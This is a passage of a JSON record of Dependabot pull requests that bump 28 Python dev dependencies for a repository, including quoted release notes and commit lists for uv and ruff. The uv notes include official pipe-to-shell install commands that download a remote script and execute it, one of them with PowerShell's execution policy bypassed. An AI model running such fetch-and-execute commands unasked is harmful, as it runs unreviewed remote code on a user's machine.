href=\"https://github.com/jupyter/jupyter_events/graphs/contributors?from=2025-02-03\u0026amp;to=2026-04-20\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_events+involves%3ACarreau+updated%3A2025-02-03..2026-04-20\u0026amp;type=Issues\"\u003eactivity\u003c/a\u003e) | \u003ca href=\"https://...\n\n_Description has been truncated_","html_url":"https://github.com/BryanOwens012/which-glp/pull/190","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/BryanOwens012%2Fwhich-glp/issues/190","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/190/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-08T06:18:25.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4610482800","node_id":"PR_kwDOR-7nxM7jxxc5","number":163,"state":"open","title":"chore(deps-dev): Bump the dev-dependencies group across 1 directory with 28 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-08T06:18:25.000Z","updated_at":"2026-06-08T06:20:50.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps-dev): Bump","group_name":"dev-dependencies","update_count":28,"packages":[{"name":"uv","old_version":"0.11.7","new_version":"0.11.19","repository_url":"https://github.com/astral-sh/uv"},{"name":"ruff","old_version":"0.15.11","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"},{"name":"ty","old_version":"0.0.31","new_version":"0.0.44","repository_url":"https://github.com/astral-sh/ty"},{"name":"hypothesis","old_version":"6.152.1","new_version":"6.155.2","repository_url":"https://github.com/HypothesisWorks/hypothesis"},{"name":"beautifulsoup4","old_version":"4.14.3","new_version":"4.15.0"},{"name":"mutmut","old_version":"3.5.0","new_version":"3.6.0","repository_url":"https://github.com/boxed/mutmut"},{"name":"pre-commit","old_version":"4.5.1","new_version":"4.6.0","repository_url":"https://github.com/pre-commit/pre-commit"},{"name":"certifi","old_version":"2026.2.25","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"coverage","old_version":"7.13.5","new_version":"7.14.1","repository_url":"https://github.com/coveragepy/coveragepy"},{"name":"cyclonedx-python-lib","old_version":"11.7.0","new_version":"11.8.0","repository_url":"https://github.com/CycloneDX/cyclonedx-python-lib"},{"name":"distlib","old_version":"0.4.0","new_version":"0.4.1","repository_url":"https://github.com/pypa/distlib"},{"name":"filelock","old_version":"3.25.2","new_version":"3.29.1","repository_url":"https://github.com/tox-dev/py-filelock"},{"name":"identify","old_version":"2.6.18","new_version":"2.6.19","repository_url":"https://github.com/pre-commit/identify"},{"name":"idna","old_version":"3.11","new_version":"3.18","repository_url":"https://github.com/kjd/idna"},{"name":"mdit-py-plugins","old_version":"0.5.0","new_version":"0.6.1","repository_url":"https://github.com/executablebooks/mdit-py-plugins"},{"name":"packaging","old_version":"26.0","new_version":"26.2","repository_url":"https://github.com/pypa/packaging"},{"name":"pip","old_version":"26.0.1","new_version":"26.1.2","repository_url":"https://github.com/pypa/pip"},{"name":"platformdirs","old_version":"4.9.6","new_version":"4.10.0","repository_url":"https://github.com/tox-dev/platformdirs"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"pyopenssl","old_version":"26.0.0","new_version":"26.2.0","repository_url":"https://github.com/pyca/pyopenssl"},{"name":"python-discovery","old_version":"1.2.2","new_version":"1.4.0","repository_url":"https://github.com/tox-dev/python-discovery"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"securesystemslib","old_version":"1.3.1","new_version":"1.4.0","repository_url":"https://github.com/secure-systems-lab/securesystemslib"},{"name":"sigstore","old_version":"4.2.0","new_version":"4.3.0","repository_url":"https://github.com/sigstore/sigstore-python"},{"name":"soupsieve","old_version":"2.8.3","new_version":"2.8.4","repository_url":"https://github.com/facelessuser/soupsieve"},{"name":"textual","old_version":"8.2.4","new_version":"8.2.7","repository_url":"https://github.com/Textualize/textual"},{"name":"urllib3","old_version":"2.6.3","new_version":"2.7.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"virtualenv","old_version":"21.2.0","new_version":"21.4.2","repository_url":"https://github.com/pypa/virtualenv"}],"path":null,"ecosystem":"pip"},"body":"Bumps the dev-dependencies group with 28 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [uv](https://github.com/astral-sh/uv) | `0.11.7` | `0.11.19` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.11` | `0.15.16` |\n| [ty](https://github.com/astral-sh/ty) | `0.0.31` | `0.0.44` |\n| [hypothesis](https://github.com/HypothesisWorks/hypothesis) | `6.152.1` | `6.155.2` |\n| [beautifulsoup4](https://www.crummy.com/software/BeautifulSoup/bs4/) | `4.14.3` | `4.15.0` |\n| [mutmut](https://github.com/boxed/mutmut) | `3.5.0` | `3.6.0` |\n| [pre-commit](https://github.com/pre-commit/pre-commit) | `4.5.1` | `4.6.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2026.2.25` | `2026.5.20` |\n| [coverage](https://github.com/coveragepy/coveragepy) | `7.13.5` | `7.14.1` |\n| [cyclonedx-python-lib](https://github.com/CycloneDX/cyclonedx-python-lib) | `11.7.0` | `11.8.0` |\n| [distlib](https://github.com/pypa/distlib) | `0.4.0` | `0.4.1` |\n| [filelock](https://github.com/tox-dev/py-filelock) | `3.25.2` | `3.29.1` |\n| [identify](https://github.com/pre-commit/identify) | `2.6.18` | `2.6.19` |\n| [idna](https://github.com/kjd/idna) | `3.11` | `3.18` |\n| [mdit-py-plugins](https://github.com/executablebooks/mdit-py-plugins) | `0.5.0` | `0.6.1` |\n| [packaging](https://github.com/pypa/packaging) | `26.0` | `26.2` |\n| [pip](https://github.com/pypa/pip) | `26.0.1` | `26.1.2` |\n| [platformdirs](https://github.com/tox-dev/platformdirs) | `4.9.6` | `4.10.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [pyopenssl](https://github.com/pyca/pyopenssl) | `26.0.0` | `26.2.0` |\n| [python-discovery](https://github.com/tox-dev/python-discovery) | `1.2.2` | `1.4.0` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [securesystemslib](https://github.com/secure-systems-lab/securesystemslib) | `1.3.1` | `1.4.0` |\n| [sigstore](https://github.com/sigstore/sigstore-python) | `4.2.0` | `4.3.0` |\n| [soupsieve](https://github.com/facelessuser/soupsieve) | `2.8.3` | `2.8.4` |\n| [textual](https://github.com/Textualize/textual) | `8.2.4` | `8.2.7` |\n| [urllib3](https://github.com/urllib3/urllib3) | `2.6.3` | `2.7.0` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `21.2.0` | `21.4.2` |\n\n\nUpdates `uv` from 0.11.7 to 0.11.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/uv/releases\"\u003euv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.11.19\u003c/h2\u003e\n\u003ch2\u003eRelease Notes\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-03.\u003c/p\u003e\n\u003ch3\u003ePython\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd CPython 3.15.0b2 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19531\"\u003e#19531\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAlways compute SHA256 for remote distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19662\"\u003e#19662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd PyEmscripten platform (PEP 783) (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19629\"\u003e#19629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Pyodide 2025 target triple (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19653\"\u003e#19653\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMake preview features for commands have names that aren't ambiguous with the command (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19645\"\u003e#19645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRespect \u003ccode\u003e--isolated\u003c/code\u003e in \u003ccode\u003euv check\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19666\"\u003e#19666\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eContinue tool uninstall after dangling receipts (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19623\"\u003e#19623\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSkip Unix-specific installation steps when cross-installing Windows Python distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19424\"\u003e#19424\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eInstall uv 0.11.19\u003c/h2\u003e\n\u003ch3\u003eInstall prebuilt binaries via shell script\u003c/h3\u003e\n\u003cpre lang=\"sh\"\u003e\u003ccode\u003ecurl --proto '=https' --tlsv1.2 -LsSf https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-installer.sh | sh\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003eInstall prebuilt binaries via powershell script\u003c/h3\u003e\n\u003cpre lang=\"sh\"\u003e\u003ccode\u003epowershell -ExecutionPolicy Bypass -c \u0026quot;irm https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-installer.ps1 | iex\u0026quot;\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch2\u003eDownload uv 0.11.19\u003c/h2\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eFile\u003c/th\u003e\n\u003cth\u003ePlatform\u003c/th\u003e\n\u003cth\u003eChecksum\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-apple-darwin.tar.gz\"\u003euv-aarch64-apple-darwin.tar.gz\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003eApple Silicon macOS\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-apple-darwin.tar.gz.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-x86_64-apple-darwin.tar.gz\"\u003euv-x86_64-apple-darwin.tar.gz\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003eIntel macOS\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-x86_64-apple-darwin.tar.gz.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-pc-windows-msvc.zip\"\u003euv-aarch64-pc-windows-msvc.zip\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003eARM64 Windows\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-pc-windows-msvc.zip.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-i686-pc-windows-msvc.zip\"\u003euv-i686-pc-windows-msvc.zip\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003ex86 Windows\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-i686-pc-windows-msvc.zip.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-x86_64-pc-windows-msvc.zip\"\u003euv-x86_64-pc-windows-msvc.zip\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003ex64 Windows\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-x86_64-pc-windows-msvc.zip.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-unknown-linux-gnu.tar.gz\"\u003euv-aarch64-unknown-linux-gnu.tar.gz\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003eARM64 Linux\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-unknown-linux-gnu.tar.gz.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-i686-unknown-linux-gnu.tar.gz\"\u003euv-i686-unknown-linux-gnu.tar.gz\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003ex86 Linux\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-i686-unknown-linux-gnu.tar.gz.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/uv/blob/main/CHANGELOG.md\"\u003euv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.11.19\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-03.\u003c/p\u003e\n\u003ch3\u003ePython\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd CPython 3.15.0b2 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19531\"\u003e#19531\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAlways compute SHA256 for remote distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19662\"\u003e#19662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd PyEmscripten platform (PEP 783) (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19629\"\u003e#19629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Pyodide 2025 target triple (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19653\"\u003e#19653\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMake preview features for commands have names that aren't ambiguous with the command (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19645\"\u003e#19645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRespect \u003ccode\u003e--isolated\u003c/code\u003e in \u003ccode\u003euv check\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19666\"\u003e#19666\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eContinue tool uninstall after dangling receipts (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19623\"\u003e#19623\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSkip Unix-specific installation steps when cross-installing Windows Python distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19424\"\u003e#19424\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.11.18\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-01.\u003c/p\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix performance regression in unzip of local wheels (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19637\"\u003e#19637\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003euv check\u003c/code\u003e to run \u003ccode\u003ety\u003c/code\u003e from uv (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19605\"\u003e#19605\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate activation scripts with upstream fixes (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19628\"\u003e#19628\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump MSRV to 1.94 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19600\"\u003e#19600\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.11.17\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-05-28.\u003c/p\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/7b2cff1c316eb3b7f52b1cc121d7e25eeea1b17c\"\u003e\u003ccode\u003e7b2cff1\u003c/code\u003e\u003c/a\u003e Bump version to 0.11.19 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19668\"\u003e#19668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/ebd5033d77bca6a58c329cbbc351406a9415c920\"\u003e\u003ccode\u003eebd5033\u003c/code\u003e\u003c/a\u003e Fix setup-crates-io-publish call (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19667\"\u003e#19667\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/9abd9b122b963dc6d71a8b29729efa86b3b41d4c\"\u003e\u003ccode\u003e9abd9b1\u003c/code\u003e\u003c/a\u003e Respect \u003ccode\u003e--isolated\u003c/code\u003e in \u003ccode\u003euv check\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19666\"\u003e#19666\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/95507374d81bee4c6ffe55d9ccef60c5120e20b2\"\u003e\u003ccode\u003e9550737\u003c/code\u003e\u003c/a\u003e Use global preview in \u003ccode\u003eCondaEnvironmentKind::from_prefix_path\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19649\"\u003e#19649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/b82cadf1555c23a0971bd660ed07fba223290aee\"\u003e\u003ccode\u003eb82cadf\u003c/code\u003e\u003c/a\u003e Remove more duplication in \u003ccode\u003eshow_settings\u003c/code\u003e tests (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19664\"\u003e#19664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/d3cd632c83dbce8452cd2d4c3ccd8a3cd8ff5069\"\u003e\u003ccode\u003ed3cd632\u003c/code\u003e\u003c/a\u003e Always compute SHA256 for remote distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19662\"\u003e#19662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/48548c496e835a84c9a69d7d7e7d3b4b809fad8c\"\u003e\u003ccode\u003e48548c4\u003c/code\u003e\u003c/a\u003e Sync latest Python releases (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19531\"\u003e#19531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/8df759892cd54488c66a77852d7fc3f87a066f64\"\u003e\u003ccode\u003e8df7598\u003c/code\u003e\u003c/a\u003e fix feature-gates on \u003ccode\u003eformat\u003c/code\u003e and \u003ccode\u003echeck\u003c/code\u003e tests to specify they access r2 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/68ae09e00cb4a1b7eb512b0ac77b79e4683cfaf4\"\u003e\u003ccode\u003e68ae09e\u003c/code\u003e\u003c/a\u003e Remove unused \u003ccode\u003epub\u003c/code\u003e code from workspace (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19565\"\u003e#19565\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/d4450f385074cd2a639e2525f44608c3c27f6414\"\u003e\u003ccode\u003ed4450f3\u003c/code\u003e\u003c/a\u003e Remove a bunch of duplication in \u003ccode\u003eshow_settings\u003c/code\u003e tests by using diffs (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19654\"\u003e#19654\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/astral-sh/uv/compare/0.11.7...0.11.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ruff` from 0.15.11 to 0.15.16\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ruff/releases\"\u003eruff's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.15.16\u003c/h2\u003e\n\u003ch2\u003eRelease Notes\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-04.\u003c/p\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-async\u003c/code\u003e] Implement \u003ccode\u003eyield-in-context-manager-in-async-generator\u003c/code\u003e (\u003ccode\u003eASYNC119\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24644\"\u003e#24644\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Narrow diagnostic range and exclude cases without exception handlers (\u003ccode\u003ePLW0717\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25440\"\u003e#25440\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Treat \u003ccode\u003eyield\u003c/code\u003e before \u003ccode\u003ebreak\u003c/code\u003e from a terminal loop as terminal (\u003ccode\u003eRUF075\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25447\"\u003e#25447\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eeradicate\u003c/code\u003e] Avoid flagging \u003ccode\u003eruff:ignore\u003c/code\u003e comments as code (\u003ccode\u003eERA001\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25537\"\u003e#25537\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eeradicate\u003c/code\u003e] Fix \u003ccode\u003eERA001\u003c/code\u003e/\u003ccode\u003eRUF100\u003c/code\u003e conflict when \u003ccode\u003enoqa\u003c/code\u003e is on commented-out code (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25414\"\u003e#25414\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyflakes\u003c/code\u003e] Avoid removing the \u003ccode\u003eformat\u003c/code\u003e call when it would change behavior (\u003ccode\u003eF523\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25320\"\u003e#25320\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Avoid syntax errors in invalid character replacements in f-strings before Python 3.12 (\u003ccode\u003ePLE2510\u003c/code\u003e, \u003ccode\u003ePLE2512\u003c/code\u003e, \u003ccode\u003ePLE2513\u003c/code\u003e, \u003ccode\u003ePLE2514\u003c/code\u003e, \u003ccode\u003ePLE2515\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25544\"\u003e#25544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Avoid converting \u003ccode\u003eformat\u003c/code\u003e calls with more kinds of side effects (\u003ccode\u003eUP032\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25484\"\u003e#25484\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRule changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Avoid fixes for ambiguous \u003ccode\u003eargnames\u003c/code\u003e and \u003ccode\u003eargvalues\u003c/code\u003e combinations (\u003ccode\u003ePT006\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24776\"\u003e#24776\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop excess capacity from statement suites during parsing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25368\"\u003e#25368\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003epydocstyle\u003c/code\u003e] Improve discoverability of rules enabled for each convention (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24973\"\u003e#24973\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Restore example code for Python versions before 3.15 (\u003ccode\u003eRUF017\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25439\"\u003e#25439\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix typo \u003ccode\u003ebin/active\u003c/code\u003e → \u003ccode\u003ebin/activate\u003c/code\u003e in tutorial (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25473\"\u003e#25473\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShrink additional parser AST collections (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25465\"\u003e#25465\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Redslayer112\"\u003e\u003ccode\u003e@​Redslayer112\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/koriyoshi2041\"\u003e\u003ccode\u003e@​koriyoshi2041\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/George-Ogden\"\u003e\u003ccode\u003e@​George-Ogden\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TejasAmle\"\u003e\u003ccode\u003e@​TejasAmle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anishgirianish\"\u003e\u003ccode\u003e@​anishgirianish\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ntBre\"\u003e\u003ccode\u003e@​ntBre\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 